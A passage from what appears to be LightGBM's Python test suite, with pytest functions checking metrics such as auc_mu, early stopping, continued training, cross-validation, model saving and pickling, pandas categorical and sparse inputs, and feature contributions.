assert results['training']['multi_error@10'][-1] == pytest.approx(err)
# check cases where predictions are equal
X = np.array([[0, 0], [0, 0]])
y = np.array([0, 1])
lgb_data = lgb.Dataset(X, label=y)
params['num_classes'] = 2
results = {}
lgb.train(params, lgb_data, num_boost_round=10,
valid_sets=[lgb_data], evals_result=results, verbose_eval=False)
assert results['training']['multi_error'][-1] == pytest.approx(1)
results = {}
lgb.train(dict(params, multi_error_top_k=2), lgb_data, num_boost_round=10,
valid_sets=[lgb_data], evals_result=results, verbose_eval=False)
assert results['training']['multi_error@2'][-1] == pytest.approx(0)
def test_auc_mu():
# should give same result as binary auc for 2 classes
X, y = load_digits(n_class=10, return_X_y=True)
y_new = np.zeros((len(y)))
y_new[y != 0] = 1
lgb_X = lgb.Dataset(X, label=y_new)
params = {'objective': 'multiclass',
'metric': 'auc_mu',
'verbose': -1,
'num_classes': 2,
'seed': 0}
results_auc_mu = {}
lgb.train(params, lgb_X, num_boost_round=10, valid_sets=[lgb_X], evals_result=results_auc_mu)
params = {'objective': 'binary',
'metric': 'auc',
'verbose': -1,
'seed': 0}
results_auc = {}
lgb.train(params, lgb_X, num_boost_round=10, valid_sets=[lgb_X], evals_result=results_auc)
np.testing.assert_allclose(results_auc_mu['training']['auc_mu'], results_auc['training']['auc'])
# test the case where all predictions are equal
lgb_X = lgb.Dataset(X[:10], label=y_new[:10])
params = {'objective': 'multiclass',
'metric': 'auc_mu',
'verbose': -1,
'num_classes': 2,
'min_data_in_leaf': 20,
'seed': 0}
results_auc_mu = {}
lgb.train(params, lgb_X, num_boost_round=10, valid_sets=[lgb_X], evals_result=results_auc_mu)
assert results_auc_mu['training']['auc_mu'][-1] == pytest.approx(0.5)
# test that weighted data gives different auc_mu
lgb_X = lgb.Dataset(X, label=y)
lgb_X_weighted = lgb.Dataset(X, label=y, weight=np.abs(np.random.normal(size=y.shape)))
results_unweighted = {}
results_weighted = {}
params = dict(params, num_classes=10, num_leaves=5)
lgb.train(params, lgb_X, num_boost_round=10, valid_sets=[lgb_X], evals_result=results_unweighted)
lgb.train(params, lgb_X_weighted, num_boost_round=10, valid_sets=[lgb_X_weighted],
evals_result=results_weighted)
assert results_weighted['training']['auc_mu'][-1] < 1
assert results_unweighted['training']['auc_mu'][-1] != results_weighted['training']['auc_mu'][-1]
# test that equal data weights give same auc_mu as unweighted data
lgb_X_weighted = lgb.Dataset(X, label=y, weight=np.ones(y.shape) * 0.5)
lgb.train(params, lgb_X_weighted, num_boost_round=10, valid_sets=[lgb_X_weighted],
evals_result=results_weighted)
assert results_unweighted['training']['auc_mu'][-1] == pytest.approx(
results_weighted['training']['auc_mu'][-1], abs=1e-5)
# should give 1 when accuracy = 1
X = X[:10, :]
y = y[:10]
lgb_X = lgb.Dataset(X, label=y)
params = {'objective': 'multiclass',
'metric': 'auc_mu',
'num_classes': 10,
'min_data_in_leaf': 1,
'verbose': -1}
results = {}
lgb.train(params, lgb_X, num_boost_round=100, valid_sets=[lgb_X], evals_result=results)
assert results['training']['auc_mu'][-1] == pytest.approx(1)
# test loading class weights
Xy = np.loadtxt(
str(Path(__file__).absolute().parents[2] / 'examples' / 'multiclass_classification' / 'multiclass.train')
)
y = Xy[:, 0]
X = Xy[:, 1:]
lgb_X = lgb.Dataset(X, label=y)
params = {'objective': 'multiclass',
'metric': 'auc_mu',
'auc_mu_weights': [0, 2, 2, 2, 2, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0],
'num_classes': 5,
'verbose': -1,
'seed': 0}
results_weight = {}
lgb.train(params, lgb_X, num_boost_round=5, valid_sets=[lgb_X], evals_result=results_weight)
params['auc_mu_weights'] = []
results_no_weight = {}
lgb.train(params, lgb_X, num_boost_round=5, valid_sets=[lgb_X], evals_result=results_no_weight)
assert results_weight['training']['auc_mu'][-1] != results_no_weight['training']['auc_mu'][-1]
def test_ranking_prediction_early_stopping():
rank_example_dir = Path(__file__).absolute().parents[2] / 'examples' / 'lambdarank'
X_train, y_train = load_svmlight_file(str(rank_example_dir / 'rank.train'))
q_train = np.loadtxt(str(rank_example_dir / 'rank.train.query'))
X_test, _ = load_svmlight_file(str(rank_example_dir / 'rank.test'))
params = {
'objective': 'rank_xendcg',
'verbose': -1
}
lgb_train = lgb.Dataset(X_train, y_train, group=q_train, params=params)
gbm = lgb.train(params, lgb_train, num_boost_round=50)
pred_parameter = {"pred_early_stop": True,
"pred_early_stop_freq": 5,
"pred_early_stop_margin": 1.5}
ret_early = gbm.predict(X_test, **pred_parameter)
pred_parameter["pred_early_stop_margin"] = 5.5
ret_early_more_strict = gbm.predict(X_test, **pred_parameter)
with pytest.raises(AssertionError):
np.testing.assert_allclose(ret_early, ret_early_more_strict)
def test_early_stopping():
X, y = load_breast_cancer(return_X_y=True)
params = {
'objective': 'binary',
'metric': 'binary_logloss',
'verbose': -1
}
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
lgb_train = lgb.Dataset(X_train, y_train)
lgb_eval = lgb.Dataset(X_test, y_test, reference=lgb_train)
valid_set_name = 'valid_set'
# no early stopping
gbm = lgb.train(params, lgb_train,
num_boost_round=10,
valid_sets=lgb_eval,
valid_names=valid_set_name,
verbose_eval=False,
early_stopping_rounds=5)
assert gbm.best_iteration == 10
assert valid_set_name in gbm.best_score
assert 'binary_logloss' in gbm.best_score[valid_set_name]
# early stopping occurs
gbm = lgb.train(params, lgb_train,
num_boost_round=40,
valid_sets=lgb_eval,
valid_names=valid_set_name,
verbose_eval=False,
early_stopping_rounds=5)
assert gbm.best_iteration <= 39
assert valid_set_name in gbm.best_score
assert 'binary_logloss' in gbm.best_score[valid_set_name]
def test_continue_train():
X, y = load_boston(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'objective': 'regression',
'metric': 'l1',
'verbose': -1
}
lgb_train = lgb.Dataset(X_train, y_train, free_raw_data=False)
lgb_eval = lgb.Dataset(X_test, y_test, reference=lgb_train, free_raw_data=False)
init_gbm = lgb.train(params, lgb_train, num_boost_round=20)
model_name = 'model.txt'
init_gbm.save_model(model_name)
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=30,
valid_sets=lgb_eval,
verbose_eval=False,
# test custom eval metrics
feval=(lambda p, d: ('custom_mae', mean_absolute_error(p, d.get_label()), False)),
evals_result=evals_result,
init_model='model.txt')
ret = mean_absolute_error(y_test, gbm.predict(X_test))
assert ret < 2.0
assert evals_result['valid_0']['l1'][-1] == pytest.approx(ret)
np.testing.assert_allclose(evals_result['valid_0']['l1'], evals_result['valid_0']['custom_mae'])
def test_continue_train_reused_dataset():
X, y = load_boston(return_X_y=True)
params = {
'objective': 'regression',
'verbose': -1
}
lgb_train = lgb.Dataset(X, y, free_raw_data=False)
init_gbm = lgb.train(params, lgb_train, num_boost_round=5)
init_gbm_2 = lgb.train(params, lgb_train, num_boost_round=5, init_model=init_gbm)
init_gbm_3 = lgb.train(params, lgb_train, num_boost_round=5, init_model=init_gbm_2)
gbm = lgb.train(params, lgb_train, num_boost_round=5, init_model=init_gbm_3)
assert gbm.current_iteration() == 20
def test_continue_train_dart():
X, y = load_boston(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'boosting_type': 'dart',
'objective': 'regression',
'metric': 'l1',
'verbose': -1
}
lgb_train = lgb.Dataset(X_train, y_train, free_raw_data=False)
lgb_eval = lgb.Dataset(X_test, y_test, reference=lgb_train, free_raw_data=False)
init_gbm = lgb.train(params, lgb_train, num_boost_round=50)
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=50,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result,
init_model=init_gbm)
ret = mean_absolute_error(y_test, gbm.predict(X_test))
assert ret < 2.0
assert evals_result['valid_0']['l1'][-1] == pytest.approx(ret)
def test_continue_train_multiclass():
X, y = load_iris(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'objective': 'multiclass',
'metric': 'multi_logloss',
'num_class': 3,
'verbose': -1
}
lgb_train = lgb.Dataset(X_train, y_train, params=params, free_raw_data=False)
lgb_eval = lgb.Dataset(X_test, y_test, reference=lgb_train, params=params, free_raw_data=False)
init_gbm = lgb.train(params, lgb_train, num_boost_round=20)
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=30,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result,
init_model=init_gbm)
ret = multi_logloss(y_test, gbm.predict(X_test))
assert ret < 0.1
assert evals_result['valid_0']['multi_logloss'][-1] == pytest.approx(ret)
def test_cv():
X_train, y_train = load_boston(return_X_y=True)
params = {'verbose': -1}
lgb_train = lgb.Dataset(X_train, y_train)
# shuffle = False, override metric in params
params_with_metric = {'metric': 'l2', 'verbose': -1}
cv_res = lgb.cv(params_with_metric, lgb_train, num_boost_round=10,
nfold=3, stratified=False, shuffle=False,
metrics='l1', verbose_eval=False)
assert 'l1-mean' in cv_res
assert 'l2-mean' not in cv_res
assert len(cv_res['l1-mean']) == 10
# shuffle = True, callbacks
cv_res = lgb.cv(params, lgb_train, num_boost_round=10, nfold=3, stratified=False, shuffle=True,
metrics='l1', verbose_eval=False,
callbacks=[lgb.reset_parameter(learning_rate=lambda i: 0.1 - 0.001 * i)])
assert 'l1-mean' in cv_res
assert len(cv_res['l1-mean']) == 10
# enable display training loss
cv_res = lgb.cv(params_with_metric, lgb_train, num_boost_round=10,
nfold=3, stratified=False, shuffle=False,
metrics='l1', verbose_eval=False, eval_train_metric=True)
assert 'train l1-mean' in cv_res
assert 'valid l1-mean' in cv_res
assert 'train l2-mean' not in cv_res
assert 'valid l2-mean' not in cv_res
assert len(cv_res['train l1-mean']) == 10
assert len(cv_res['valid l1-mean']) == 10
# self defined folds
tss = TimeSeriesSplit(3)
folds = tss.split(X_train)
cv_res_gen = lgb.cv(params_with_metric, lgb_train, num_boost_round=10, folds=folds,
verbose_eval=False)
cv_res_obj = lgb.cv(params_with_metric, lgb_train, num_boost_round=10, folds=tss,
verbose_eval=False)
np.testing.assert_allclose(cv_res_gen['l2-mean'], cv_res_obj['l2-mean'])
# LambdaRank
rank_example_dir = Path(__file__).absolute().parents[2] / 'examples' / 'lambdarank'
X_train, y_train = load_svmlight_file(str(rank_example_dir / 'rank.train'))
q_train = np.loadtxt(str(rank_example_dir / 'rank.train.query'))
params_lambdarank = {'objective': 'lambdarank', 'verbose': -1, 'eval_at': 3}
lgb_train = lgb.Dataset(X_train, y_train, group=q_train)
# ... with l2 metric
cv_res_lambda = lgb.cv(params_lambdarank, lgb_train, num_boost_round=10, nfold=3,
metrics='l2', verbose_eval=False)
assert len(cv_res_lambda) == 2
assert not np.isnan(cv_res_lambda['l2-mean']).any()
# ... with NDCG (default) metric
cv_res_lambda = lgb.cv(params_lambdarank, lgb_train, num_boost_round=10, nfold=3,
verbose_eval=False)
assert len(cv_res_lambda) == 2
assert not np.isnan(cv_res_lambda['ndcg@3-mean']).any()
# self defined folds with lambdarank
cv_res_lambda_obj = lgb.cv(params_lambdarank, lgb_train, num_boost_round=10,
folds=GroupKFold(n_splits=3),
verbose_eval=False)
np.testing.assert_allclose(cv_res_lambda['ndcg@3-mean'], cv_res_lambda_obj['ndcg@3-mean'])
def test_cvbooster():
X, y = load_breast_cancer(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'objective': 'binary',
'metric': 'binary_logloss',
'verbose': -1,
}
lgb_train = lgb.Dataset(X_train, y_train)
# with early stopping
cv_res = lgb.cv(params, lgb_train,
num_boost_round=25,
early_stopping_rounds=5,
verbose_eval=False,
nfold=3,
return_cvbooster=True)
assert 'cvbooster' in cv_res
cvb = cv_res['cvbooster']
assert isinstance(cvb, lgb.CVBooster)
assert isinstance(cvb.boosters, list)
assert len(cvb.boosters) == 3
assert all(isinstance(bst, lgb.Booster) for bst in cvb.boosters)
assert cvb.best_iteration > 0
# predict by each fold booster
preds = cvb.predict(X_test, num_iteration=cvb.best_iteration)
assert isinstance(preds, list)
assert len(preds) == 3
# fold averaging
avg_pred = np.mean(preds, axis=0)
ret = log_loss(y_test, avg_pred)
assert ret < 0.13
# without early stopping
cv_res = lgb.cv(params, lgb_train,
num_boost_round=20,
verbose_eval=False,
nfold=3,
return_cvbooster=True)
cvb = cv_res['cvbooster']
assert cvb.best_iteration == -1
preds = cvb.predict(X_test)
avg_pred = np.mean(preds, axis=0)
ret = log_loss(y_test, avg_pred)
assert ret < 0.15
def test_feature_name():
X_train, y_train = load_boston(return_X_y=True)
params = {'verbose': -1}
lgb_train = lgb.Dataset(X_train, y_train)
feature_names = [f'f_{i}' for i in range(X_train.shape[-1])]
gbm = lgb.train(params, lgb_train, num_boost_round=5, feature_name=feature_names)
assert feature_names == gbm.feature_name()
# test feature_names with whitespaces
feature_names_with_space = [f'f {i}' for i in range(X_train.shape[-1])]
gbm = lgb.train(params, lgb_train, num_boost_round=5, feature_name=feature_names_with_space)
assert feature_names == gbm.feature_name()
def test_feature_name_with_non_ascii():
X_train = np.random.normal(size=(100, 4))
y_train = np.random.random(100)
# This has non-ascii strings.
feature_names = [u'F_零', u'F_一', u'F_二', u'F_三']
params = {'verbose': -1}
lgb_train = lgb.Dataset(X_train, y_train)
gbm = lgb.train(params, lgb_train, num_boost_round=5, feature_name=feature_names)
assert feature_names == gbm.feature_name()
gbm.save_model('lgb.model')
gbm2 = lgb.Booster(model_file='lgb.model')
assert feature_names == gbm2.feature_name()
def test_save_load_copy_pickle():
def train_and_predict(init_model=None, return_model=False):
X, y = load_boston(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'objective': 'regression',
'metric': 'l2',
'verbose': -1
}
lgb_train = lgb.Dataset(X_train, y_train)
gbm_template = lgb.train(params, lgb_train, num_boost_round=10, init_model=init_model)
return gbm_template if return_model else mean_squared_error(y_test, gbm_template.predict(X_test))
gbm = train_and_predict(return_model=True)
ret_origin = train_and_predict(init_model=gbm)
other_ret = []
gbm.save_model('lgb.model')
with open('lgb.model') as f: # check all params are logged into model file correctly
assert f.read().find("[num_iterations: 10]") != -1
other_ret.append(train_and_predict(init_model='lgb.model'))
gbm_load = lgb.Booster(model_file='lgb.model')
other_ret.append(train_and_predict(init_model=gbm_load))
other_ret.append(train_and_predict(init_model=copy.copy(gbm)))
other_ret.append(train_and_predict(init_model=copy.deepcopy(gbm)))
with open('lgb.pkl', 'wb') as f:
pickle.dump(gbm, f)
with open('lgb.pkl', 'rb') as f:
gbm_pickle = pickle.load(f)
other_ret.append(train_and_predict(init_model=gbm_pickle))
gbm_pickles = pickle.loads(pickle.dumps(gbm))
other_ret.append(train_and_predict(init_model=gbm_pickles))
for ret in other_ret:
assert ret_origin == pytest.approx(ret)
def test_pandas_categorical():
pd = pytest.importorskip("pandas")
np.random.seed(42) # sometimes there is no difference how cols are treated (cat or not cat)
X = pd.DataFrame({"A": np.random.permutation(['a', 'b', 'c', 'd'] * 75), # str
"B": np.random.permutation([1, 2, 3] * 100), # int
"C": np.random.permutation([0.1, 0.2, -0.1, -0.1, 0.2] * 60), # float
"D": np.random.permutation([True, False] * 150), # bool
"E": pd.Categorical(np.random.permutation(['z', 'y', 'x', 'w', 'v'] * 60),
ordered=True)}) # str and ordered categorical
y = np.random.permutation([0, 1] * 150)
X_test = pd.DataFrame({"A": np.random.permutation(['a', 'b', 'e'] * 20), # unseen category
"B": np.random.permutation([1, 3] * 30),
"C": np.random.permutation([0.1, -0.1, 0.2, 0.2] * 15),
"D": np.random.permutation([True, False] * 30),
"E": pd.Categorical(np.random.permutation(['z', 'y'] * 30),
ordered=True)})
np.random.seed() # reset seed
cat_cols_actual = ["A", "B", "C", "D"]
cat_cols_to_store = cat_cols_actual + ["E"]
X[cat_cols_actual] = X[cat_cols_actual].astype('category')
X_test[cat_cols_actual] = X_test[cat_cols_actual].astype('category')
cat_values = [X[col].cat.categories.tolist() for col in cat_cols_to_store]
params = {
'objective': 'binary',
'metric': 'binary_logloss',
'verbose': -1
}
lgb_train = lgb.Dataset(X, y)
gbm0 = lgb.train(params, lgb_train, num_boost_round=10)
pred0 = gbm0.predict(X_test)
assert lgb_train.categorical_feature == 'auto'
lgb_train = lgb.Dataset(X, pd.DataFrame(y)) # also test that label can be one-column pd.DataFrame
gbm1 = lgb.train(params, lgb_train, num_boost_round=10, categorical_feature=[0])
pred1 = gbm1.predict(X_test)
assert lgb_train.categorical_feature == [0]
lgb_train = lgb.Dataset(X, pd.Series(y)) # also test that label can be pd.Series
gbm2 = lgb.train(params, lgb_train, num_boost_round=10, categorical_feature=['A'])
pred2 = gbm2.predict(X_test)
assert lgb_train.categorical_feature == ['A']
lgb_train = lgb.Dataset(X, y)
gbm3 = lgb.train(params, lgb_train, num_boost_round=10, categorical_feature=['A', 'B', 'C', 'D'])
pred3 = gbm3.predict(X_test)
assert lgb_train.categorical_feature == ['A', 'B', 'C', 'D']
gbm3.save_model('categorical.model')
gbm4 = lgb.Booster(model_file='categorical.model')
pred4 = gbm4.predict(X_test)
model_str = gbm4.model_to_string()
gbm4.model_from_string(model_str, False)
pred5 = gbm4.predict(X_test)
gbm5 = lgb.Booster(model_str=model_str)
pred6 = gbm5.predict(X_test)
lgb_train = lgb.Dataset(X, y)
gbm6 = lgb.train(params, lgb_train, num_boost_round=10, categorical_feature=['A', 'B', 'C', 'D', 'E'])
pred7 = gbm6.predict(X_test)
assert lgb_train.categorical_feature == ['A', 'B', 'C', 'D', 'E']
lgb_train = lgb.Dataset(X, y)
gbm7 = lgb.train(params, lgb_train, num_boost_round=10, categorical_feature=[])
pred8 = gbm7.predict(X_test)
assert lgb_train.categorical_feature == []
with pytest.raises(AssertionError):
np.testing.assert_allclose(pred0, pred1)
with pytest.raises(AssertionError):
np.testing.assert_allclose(pred0, pred2)
np.testing.assert_allclose(pred1, pred2)
np.testing.assert_allclose(pred0, pred3)
np.testing.assert_allclose(pred0, pred4)
np.testing.assert_allclose(pred0, pred5)
np.testing.assert_allclose(pred0, pred6)
with pytest.raises(AssertionError):
np.testing.assert_allclose(pred0, pred7) # ordered cat features aren't treated as cat features by default
with pytest.raises(AssertionError):
np.testing.assert_allclose(pred0, pred8)
assert gbm0.pandas_categorical == cat_values
assert gbm1.pandas_categorical == cat_values
assert gbm2.pandas_categorical == cat_values
assert gbm3.pandas_categorical == cat_values
assert gbm4.pandas_categorical == cat_values
assert gbm5.pandas_categorical == cat_values
assert gbm6.pandas_categorical == cat_values
assert gbm7.pandas_categorical == cat_values
def test_pandas_sparse():
pd = pytest.importorskip("pandas")
try:
from pandas.arrays import SparseArray
except ImportError: # support old versions
from pandas import SparseArray
X = pd.DataFrame({"A": SparseArray(np.random.permutation([0, 1, 2] * 100)),
"B": SparseArray(np.random.permutation([0.0, 0.1, 0.2, -0.1, 0.2] * 60)),
"C": SparseArray(np.random.permutation([True, False] * 150))})
y = pd.Series(SparseArray(np.random.permutation([0, 1] * 150)))
X_test = pd.DataFrame({"A": SparseArray(np.random.permutation([0, 2] * 30)),
"B": SparseArray(np.random.permutation([0.0, 0.1, 0.2, -0.1] * 15)),
"C": SparseArray(np.random.permutation([True, False] * 30))})
if pd.__version__ >= '0.24.0':
for dtype in pd.concat([X.dtypes, X_test.dtypes, pd.Series(y.dtypes)]):
assert pd.api.types.is_sparse(dtype)
params = {
'objective': 'binary',
'verbose': -1
}
lgb_train = lgb.Dataset(X, y)
gbm = lgb.train(params, lgb_train, num_boost_round=10)
pred_sparse = gbm.predict(X_test, raw_score=True)
if hasattr(X_test, 'sparse'):
pred_dense = gbm.predict(X_test.sparse.to_dense(), raw_score=True)
else:
pred_dense = gbm.predict(X_test.to_dense(), raw_score=True)
np.testing.assert_allclose(pred_sparse, pred_dense)
def test_reference_chain():
X = np.random.normal(size=(100, 2))
y = np.random.normal(size=100)
tmp_dat = lgb.Dataset(X, y)
# take subsets and train
tmp_dat_train = tmp_dat.subset(np.arange(80))
tmp_dat_val = tmp_dat.subset(np.arange(80, 100)).subset(np.arange(18))
params = {'objective': 'regression_l2', 'metric': 'rmse'}
evals_result = {}
lgb.train(params, tmp_dat_train, num_boost_round=20,
valid_sets=[tmp_dat_train, tmp_dat_val],
verbose_eval=False, evals_result=evals_result)
assert len(evals_result['training']['rmse']) == 20
assert len(evals_result['valid_1']['rmse']) == 20
def test_contribs():
X, y = load_breast_cancer(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'objective': 'binary',
'metric': 'binary_logloss',
'verbose': -1,
}
lgb_train = lgb.Dataset(X_train, y_train)
gbm = lgb.train(params, lgb_train, num_boost_round=20)
assert (np.linalg.norm(gbm.predict(X_test, raw_score=True)
- np.sum(gbm.predict(X_test, pred_contrib=True), axis=1)) < 1e-4)
def test_contribs_sparse():
n_features = 20
n_samples = 100
# generate CSR sparse dataset
X, y = make_multilabel_classification(n_samples=n_samples,
sparse=True,
n_features=n_features,
n_classes=1,
n_labels=2)
y = y.flatten()
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'objective': 'binary',
'verbose': -1,
}
lgb_train = lgb.Dataset(X_train, y_train)
gbm = lgb.train(params, lgb_train, num_boost_round=20)
contribs_csr = gbm.predict(X_test, pred_contrib=True)
assert isspmatrix_csr(contribs_csr)
# convert data to dense and get back same contribs
contribs_dense = gbm.predict(X_test.toarray(), pred_contrib=True)
# validate the values are the same
if platform.machine() == 'aarch64':
np.testing.assert_allclose(contribs_csr.toarray(), contribs_dense, rtol=1, atol=1e-12)
else:
np.testing.assert_allclose(contribs_csr.toarray(), contribs_dense)
assert (np.linalg.norm(gbm.predict(X_test, raw_score=True)
- np.sum(contribs_dense, axis=1)) < 1e-4)
# validate using CSC matrix
X_test_csc = X_test.tocsc()
contribs_csc = gbm.predict(X_test_csc, pred_contrib=True)
assert isspmatrix_csc(contribs_csc)
# validate the values are the same
if platform.machine() == 'aarch64':
np.testing.assert_allclose(contribs_csc.toarray(), contribs_dense, rtol=1, atol=1e-12)
else:
np.testing.assert_allclose(contribs_csc.toarray(), contribs_dense)
def test_contribs_sparse_multiclass():
n_features = 20
n_samples = 100
n_labels = 4
# generate CSR sparse dataset
X, y = make_multilabel_classification(n_samples=n_samples,
sparse=True,
n_features=n_features,
n_classes=1,
n_labels=n_labels)
y = y.flatten()
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'objective': 'multiclass',
'num_class': n_labels,
'verbose': -1,
}
lgb_train = lgb.Dataset(X_train, y_train)
gbm = lgb.train(params, lgb_train, num_boost_round=20)
contribs_csr = gbm.predict(X_test, pred_contrib=True)
assert isinstance(contribs_csr, list)
for perclass_contribs_csr in contribs_csr:
assert isspmatrix_csr(perclass_contribs_csr)
# convert data to dense and get back same contribs
contribs_dense = gbm.predict(X_test.toarray(), pred_contrib=True)
# validate the values are the same
contribs_csr_array = np.swapaxes(np.array([sparse_array.toarray() for sparse_array in contribs_csr]), 0, 1)
contribs_csr_arr_re = contribs_csr_array.reshape((contribs_csr_array.shape[0],
contribs_csr_array.shape[1] * contribs_csr_array.shape[2]))
if platform.machine() == 'aarch64':
np.testing.assert_allclose(contribs_csr_arr_re, contribs_dense, rtol=1, atol=1e-12)
else:
np.testing.assert_allclose(contribs_csr_arr_re, contribs_dense)
contribs_dense_re = contribs_dense.reshape(contribs_csr_array.shape)
assert np.linalg.norm(gbm.predict(X_test, raw_score=True) - np.sum(contribs_dense_re, axis=2)) < 1e-4
# validate using CSC matrix
X_test_csc = X_test.tocsc()
contribs_csc = gbm.predict(X_test_csc, pred_contrib=True)
assert isinstance(contribs_csc, list)
for perclass_contribs_csc in contribs_csc:
assert isspmatrix_csc(perclass_contribs_csc)
# validate the values are the same
contribs_csc_array = np.swapaxes(np.array([sparse_array.toarray() for sparse_array in contribs_csc]), 0, 1)
contribs_csc_array = contribs_csc_array.reshape((contribs_csc_array.shape[0],
contribs_csc_array.shape[1] * contribs_csc_array.shape[2]))
if platform.machine() == 'aarch64':
np.testing.assert_allclose(contribs_csc_array, contribs_dense, rtol=1, atol=1e-12)
else:
np.testing.assert_allclose(contribs_csc_array, contribs_dense)
@pytest.mark.skipif(psutil.virtual_memory().available / 1024 / 1024 / 1024 < 3, reason='not enough RAM')
def test_int32_max_sparse_contribs():
params = {
'objective': 'binary'
}
train_features = np.random.rand(100, 1000)
train_targets = [0] * 50 + [1] * 50
lgb_train = lgb.Dataset(train_features, train_targets)
gbm = lgb.train(params, lgb_train, num_boost_round=2)
csr_input_shape = (3000000, 1000)
test_features = csr_matrix(csr_input_shape)
for i in range(0, csr_input_shape[0], csr_input_shape[0] // 6):
for j in range(0, 1000, 100):
test_features[i, j] = random.random()
y_pred_csr = gbm.predict(test_features, pred_contrib=True)
# Note there is an extra column added to the output for the expected value
csr_output_shape = (csr_input_shape[0], csr_input_shape[1] + 1)
assert y_pred_csr.shape == csr_output_shape
y_pred_csc = gbm.predict(test_features.tocsc(), pred_contrib=True)
# Note output CSC shape should be same as CSR output shape
assert y_pred_csc.shape == csr_output_shape
def test_sliced_data():
def train_and_get_predictions(features, labels):
dataset = lgb.Dataset(features, label=labels)
lgb_params = {
'application': 'binary',
'verbose': -1,
'min_data': 5,
}
gbm = lgb.train(
params=lgb_params,
train_set=dataset,
num_boost_round=10,
)
return gbm.predict(features)
num_samples = 100
features = np.random.rand(num_samples, 5)
positive_samples = int(num_samples * 0.25)
labels = np.append(np.ones(positive_samples, dtype=np.float32),
np.zeros(num_samples - positive_samples, dtype=np.float32))
# test sliced labels
origin_pred = train_and_get_predictions(features, labels)
stacked_labels = np.column_stack((labels, np.ones(num_samples, dtype=np.float32)))
sliced_labels = stacked_labels[:, 0]
sliced_pred = train_and_get_predictions(features, sliced_labels)
np.testing.assert_allclose(origin_pred, sliced_pred)
# append some columns
stacked_features = np.column_stack((np.ones(num_samples, dtype=np.float32), features))
stacked_features = np.column_stack((np.ones(num_samples, dtype=np.float32), stacked_features))
stacked_features = np.column_stack((stacked_features, np.ones(num_samples, dtype=np.float32)))
stacked_features = np.column_stack((stacked_features, np.ones(num_samples, dtype=np.float32)))
# append some rows
stacked_features = np.concatenate((np.ones(9, dtype=np.float32).reshape((1, 9)), stacked_features), axis=0)
stacked_features = np.concatenate((np.ones(9, dtype=np.float32).reshape((1, 9)), stacked_features), axis=0)
stacked_features = np.concatenate((stacked_features, np.ones(9, dtype=np.float32).reshape((1, 9))), axis=0)
stacked_features = np.concatenate((stacked_features, np.ones(9, dtype=np.float32).reshape((1, 9))), axis=0)
# test sliced 2d matrix
sliced_features = stacked_features[2:102, 2:7]
assert np.all(sliced_features == features)
sliced_pred = train_and_get_predictions(sliced_features, sliced_labels)
np.testing.assert_allclose(origin_pred, sliced_pred)
# test sliced CSR
stacked_csr = csr_matrix(stacked_features)
sliced_csr = stacked_csr[2:102, 2:7]
assert np.all(sliced_csr == features)
sliced_pred = train_and_get_predictions(sliced_csr, sliced_labels)
np.testing.assert_allclose(origin_pred, sliced_pred)
def test_init_with_subset():
data = np.random.random((50, 2))
y = [1] * 25 + [0] * 25
lgb_train = lgb.Dataset(data, y, free_raw_data=False)
subset_index_1 = np.random.choice(np.arange(50), 30, replace=False)
subset_data_1 = lgb_train.subset(subset_index_1)
subset_index_2 = np.random.choice(np.arange(50), 20, replace=False)
subset_data_2 = lgb_train.subset(subset_index_2)
params = {
'objective': 'binary',
'verbose': -1
}
init_gbm = lgb.train(params=params,
train_set=subset_data_1,
num_boost_round=10,
keep_training_booster=True)
lgb.train(params=params,
train_set=subset_data_2,
num_boost_round=10,
init_model=init_gbm)
assert lgb_train.get_data().shape[0] == 50
assert subset_data_1.get_data().shape[0] == 30
assert subset_data_2.get_data().shape[0] == 20
lgb_train.save_binary("lgb_train_data.bin")
lgb_train_from_file = lgb.Dataset('lgb_train_data.bin', free_raw_data=False)
subset_data_3 = lgb_train_from_file.subset(subset_index_1)
subset_data_4 = lgb_train_from_file.subset(subset_index_2)
init_gbm_2 = lgb.train(params=params,
train_set=subset_data_3,
num_boost_round=10,
keep_training_booster=True)
with np.testing.assert_raises_regex(lgb.basic.LightGBMError, "Unknown format of training data"):
lgb.train(params=params,
train_set=subset_data_4,
num_boost_round=10,
init_model=init_gbm_2)
assert lgb_train_from_file.get_data() == "lgb_train_data.bin"
assert subset_data_3.get_data() == "lgb_train_data.bin"
assert subset_data_4.get_data() == "lgb_train_data.bin"
def generate_trainset_for_monotone_constraints_tests(x3_to_category=True):
number_of_dpoints = 3000
x1_positively_correlated_with_y = np.random.random(size=number_of_dpoints)
x2_negatively_correlated_with_y = np.random.random(size=number_of_dpoints)
x3_negatively_correlated_with_y = np.random.random(size=number_of_dpoints)
x = np.column_stack(
(x1_positively_correlated_with_y,
x2_negatively_correlated_with_y,
categorize(x3_negatively_correlated_with_y) if x3_to_category else x3_negatively_correlated_with_y))
zs = np.random.normal(loc=0.0, scale=0.01, size=number_of_dpoints)
scales = 10. * (np.random.random(6) + 0.5)
y = (scales[0] * x1_positively_correlated_with_y
+ np.sin(scales[1] * np.pi * x1_positively_correlated_with_y)
- scales[2] * x2_negatively_correlated_with_y
- np.cos(scales[3] * np.pi * x2_negatively_correlated_with_y)
- scales[4] * x3_negatively_correlated_with_y
- np.cos(scales[5] * np.pi * x3_negatively_correlated_with_y)
+ zs)
categorical_features = []
if x3_to_category:
categorical_features = [2]
trainset = lgb.Dataset(x, label=y, categorical_feature=categorical_features, free_raw_data=False)
return trainset
